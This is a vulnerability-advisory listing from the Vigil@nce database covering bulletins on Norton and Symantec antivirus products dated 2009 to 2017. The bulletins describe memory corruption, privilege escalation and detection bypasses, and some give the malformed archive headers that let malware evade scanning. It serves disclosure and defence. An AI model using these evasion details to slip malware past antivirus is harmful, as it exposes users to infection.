The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of Norton Antivirus

computer threat CVE-2017-5565 CVE-2017-5566 CVE-2017-5567

Antivirus: privilege escalation via Microsoft Application Verifier

Synthesis of the vulnerability

An attacker can bypass restrictions via Microsoft Application Verifier of Antivirus, in order to escalate his privileges.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 5.
Creation date: 22/03/2017.
Identifiers: 1116957, CVE-2017-5565, CVE-2017-5566, CVE-2017-5567, CVE-2017-6186, CVE-2017-6417, VIGILANCE-VUL-22211.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

An attacker can bypass restrictions via Microsoft Application Verifier of Antivirus, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

cybersecurity note CVE-2016-6592

Norton: code execution via the "Download Manager"

Synthesis of the vulnerability

An attacker can use a vulnerability via Download Manager of Norton, in order to run code.
Severity: 2/4.
Creation date: 18/01/2017.
Identifiers: CVE-2016-6592, SYM17-001, VIGILANCE-VUL-21619.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

An attacker can use a vulnerability via Download Manager of Norton, in order to run code. The error isof the kind described in VIGILANCE-VUL-18671.
Full Vigil@nce bulletin... (Free trial)

computer weakness note CVE-2016-5311

Norton, Symantec Endpoint Protection: privilege escalation via DLL Pre-loading

Synthesis of the vulnerability

An attacker can bypass restrictions via DLL Pre-loading of Norton or Symantec Endpoint Protection, in order to escalate his privileges.
Severity: 2/4.
Creation date: 18/11/2016.
Identifiers: CVE-2016-5311, SYM16-021, VIGILANCE-VUL-21156.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

An attacker can bypass restrictions via DLL Pre-loading of Norton or Symantec Endpoint Protection, in order to escalate his privileges.
Full Vigil@nce bulletin... (Free trial)

security alert CVE-2016-2207 CVE-2016-2209 CVE-2016-2210

Symantec: seven vulnerabilities of the "Decomposer" module

Synthesis of the vulnerability

An attacker can use several vulnerabilities of Symantec products.
Severity: 4/4.
Number of vulnerabilities in this bulletin: 7.
Creation date: 29/06/2016.
Revision date: 29/06/2016.
Identifiers: 810, 814, 816, 818, 819, 821, 823, CERTFR-2016-AVI-222, CVE-2016-2207, CVE-2016-2209, CVE-2016-2210, CVE-2016-2211, CVE-2016-3644, CVE-2016-3645, CVE-2016-3646, VIGILANCE-VUL-19997.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Several vulnerabilities were announced in Symantec Endpoint Protection.

An attacker can generate a buffer overflow via a substream of MS-Office file, in order to trigger a denial of service, and possibly to run code. [severity:4/4; 823, CVE-2016-2209]

An attacker can force a read at an invalid address via ALPkOldFormatDecompressor::UnShrink, in order to trigger a denial of service, or to obtain sensitive information. [severity:2/4; 821, CVE-2016-3646]

An attacker can generate an integer overflow via Attachment::setDataFromAttachment, in order to trigger a denial of service, and possibly to run code. [severity:2/4; 819, CVE-2016-3645]

An attacker can generate a buffer overflow via CMIMEParser::UpdateHeader, in order to trigger a denial of service, and possibly to run code. [severity:3/4; 818, CVE-2016-3644]

An attacker can generate a memory corruption via a MSPACK archive, in order to trigger a denial of service, and possibly to run code. [severity:3/4; 816, CVE-2016-2211]

An attacker can generate a buffer overflow via CSymLHA::get_header, in order to trigger a denial of service, and possibly to run code. [severity:4/4; 814, CVE-2016-2210]

An attacker can generate a memory corruption via a RAR archive, in order to trigger a denial of service, and possibly to run code. [severity:3/4; 810, CVE-2016-2207]
Full Vigil@nce bulletin... (Free trial)

threat note CVE-2016-2208

Symantec AVE: memory corruption via PE Header

Synthesis of the vulnerability

An attacker can generate a memory corruption via a PE Header on Symantec AVE, in order to trigger a denial of service, and possibly to run code with system privileges.
Severity: 4/4.
Creation date: 17/05/2016.
Identifiers: 820, BID-90653, CVE-2016-2208, SYM16-008, VIGILANCE-VUL-19636.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The Symantec AVE engine analyzes executable in PE format.

However, a malformed PE header corrupts the memory of a kernel driver.

An attacker can therefore generate a memory corruption via a PE Header on Symantec AVE, in order to trigger a denial of service, and possibly to run code with system privileges.
Full Vigil@nce bulletin... (Free trial)

threat CVE-2012-1421 CVE-2012-1425 CVE-2012-1443

Symantec Antivirus: bypassing via CAB, CHM, ELF, EXE, Office, RAR, TAR, ZIP

Synthesis of the vulnerability

An attacker can create an archive or a program containing a virus, which is not detected by Symantec Antivirus.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 9.
Creation date: 21/03/2012.
Identifiers: BID-52575, BID-52580, BID-52600, BID-52608, BID-52610, BID-52612, BID-52613, BID-52623, BID-52626, CVE-2012-1421, CVE-2012-1425, CVE-2012-1443, CVE-2012-1446, CVE-2012-1456, CVE-2012-1457, CVE-2012-1459, CVE-2012-1461, CVE-2012-1462, VIGILANCE-VUL-11472.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Tools extracting archives (TAR, ZIP, etc.) accept to extract archives which are slightly malformed. Systems also accept to execute programs (ELF) which are slightly malformed. However, Symantec Antivirus does not detect viruses contained in these archives/programs.

A TAR archive containing "MSCF" as its first 4 bytes bypasses the detection. [severity:1/4; BID-52575, CVE-2012-1421]

A TAR archive containing "\50\4B\03\04" as its first 4 bytes bypasses the detection. [severity:1/4; BID-52580, CVE-2012-1425]

A RAR archive containing "MZ" as its first 2 bytes bypasses the detection. [severity:1/4; BID-52612, CVE-2012-1443]

An ELF program containing a large "encoding" field bypasses the detection. [severity:2/4; BID-52600, CVE-2012-1446]

A ZIP archive starting by TAR data bypasses the detection. [severity:1/4; BID-52608, CVE-2012-1456]

A TAR archive with a large size bypasses the detection. [severity:1/4; BID-52610, CVE-2012-1457]

A TAR archive with a header containing a large value bypasses the detection. [severity:1/4; BID-52623, CVE-2012-1459]

A TAR+GZ archive containing two streams bypasses the detection. [severity:1/4; BID-52626, CVE-2012-1461]

A ZIP archive starting by 1024 random bytes bypasses the detection. [severity:1/4; BID-52613, CVE-2012-1462]

An attacker can therefore create an archive containing a virus which is not detected by the antivirus, but which is extracted by extraction tools. The virus is then detected once it has been extracted on victim's computer. An attacker can also create a program, containing a virus which is not detected by the antivirus, but which can be run by the system.
Full Vigil@nce bulletin... (Free trial)

computer threat alert CVE-2010-5151 CVE-2010-5152 CVE-2010-5154

Antivirus: bypassing SSDT Hooking

Synthesis of the vulnerability

When an antivirus redirects the SSDT to detect viruses, a local attacker can use an atomicity error, in order to bypass this protection.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 13.
Creation date: 10/05/2010.
Revision date: 11/05/2010.
Identifiers: CVE-2010-5151, CVE-2010-5152, CVE-2010-5154, CVE-2010-5156, CVE-2010-5161, CVE-2010-5163, CVE-2010-5166, CVE-2010-5167, CVE-2010-5168, CVE-2010-5171, CVE-2010-5172, CVE-2010-5177, CVE-2010-5179, VIGILANCE-VUL-9633.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The SSDT table (System Service Descriptor Table) contains references of system calls:
 - NtCreateKey : create a key in registry
 - NtCreateThread : create a thread
 - NtDeleteFile : delete a file
 - etc.

Antiviruses redirect entries of this table to verification functions. Several implementations check parameters, and then call the origin system call. However, between these two operations, a local attacker can change parameters of the system call. A attacker can therefore create a program using legitimate parameters, and then change them just before the system call.

When an antivirus redirects the SSDT to detect viruses, a local attacker can therefore use an atomicity error, in order to bypass this protection.
Full Vigil@nce bulletin... (Free trial)

security vulnerability CVE-2010-0106 CVE-2010-0107 CVE-2010-0108

Symantec AV, Norton AV: several vulnerabilities

Synthesis of the vulnerability

Three vulnerabilities of Symantec and Norton products can be used by an attacker to disable the antivirus or to execute code.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 3.
Creation date: 18/02/2010.
Identifiers: BID-38127, BID-38129, BID-38222, CERTA-2010-AVI-087, CVE-2010-0106, CVE-2010-0107, CVE-2010-0108, DSECRG-09-039, SYM10-002, SYM10-003, SYM10-004, VIGILANCE-VUL-9462.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

Three vulnerabilities were announced in Symantec and Norton products.

A local attacker can disable the Symantec AntiVirus on-demand scan. [severity:2/4; BID-38127, CERTA-2010-AVI-087, CVE-2010-0106, SYM10-002]

An attacker can generate a buffer overflow in the SYMLTCOM.DLL ActiveX of Norton AV/IS, in order to execute code when the victim browses a malicious web site. [severity:2/4; BID-38129, CVE-2010-0107, SYM10-003]

An attacker can generate a buffer overflow in Symantec Client Proxy (CLIproxy.dll). [severity:1/4; BID-38222, CVE-2010-0108, DSECRG-09-039, SYM10-004]
Full Vigil@nce bulletin... (Free trial)

cybersecurity threat CVE-2009-1348

F-Secure, McAfee, Symantec: bypassing via PDF

Synthesis of the vulnerability

An attacker can create a malicious PDF document which is not detected by F-Secure, McAfee and Symantec products.
Severity: 2/4.
Number of vulnerabilities in this bulletin: 3.
Creation date: 28/10/2009.
Identifiers: BID-36848, BID-36876, CERTA-2009-AVI-172, CVE-2009-1348, FSC-2009-3, G-SEC 47-2009, G-SEC 48-2009, G-SEC 49-2009, SB10003, VIGILANCE-VUL-9133.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

A PDF document can be especially constructed to be read by Adobe Reader, but to be unrecognized by an antivirus software. An attacker can create such a document, and thus bypass products of three editors.

A malicious PDF document is not detected by Symantec and Norton products. [severity:2/4; G-SEC 47-2009]

A malicious PDF document is not detected by F-Secure products. [severity:2/4; BID-36876, FSC-2009-3, G-SEC 48-2009]

A malicious PDF document is not detected by McAfee products. A malicious TAR archive is also not detected by McAfee products. [severity:2/4; BID-36848, CERTA-2009-AVI-172, CVE-2009-1348, G-SEC 49-2009, SB10003]

An attacker can therefore create a malicious PDF document which is not detected by F-Secure, McAfee and Symantec products.
Full Vigil@nce bulletin... (Free trial)

computer weakness alert CVE-2009-3104

Symantec, Norton AV: denial of service

Synthesis of the vulnerability

An attacker can send a malicious email, in order to prevent the victim from reading his other emails.
Severity: 1/4.
Creation date: 28/08/2009.
Identifiers: BID-34670, CVE-2009-3104, SYM09-012, VIGILANCE-VUL-8982.
Full Vigil@nce bulletin... (Free trial)

Description of the vulnerability

The Norton AntiVirus, Norton Internet Security, Symantec AntiVirus Corporate Edition and Symantec Client Security products use the Internet Email Scanning feature to scan emails when they are downloaded from the mail server.

However, a malicious email generates an infinite loop in the analysis engine, and interrupts the session with the mail server. The victim then cannot download his emails.

An attacker can therefore send a malicious email, in order to prevent the victim from reading his other emails.
Full Vigil@nce bulletin... (Free trial)
Our database contains other pages. You can request a free trial to read them.

Display information about Norton Antivirus: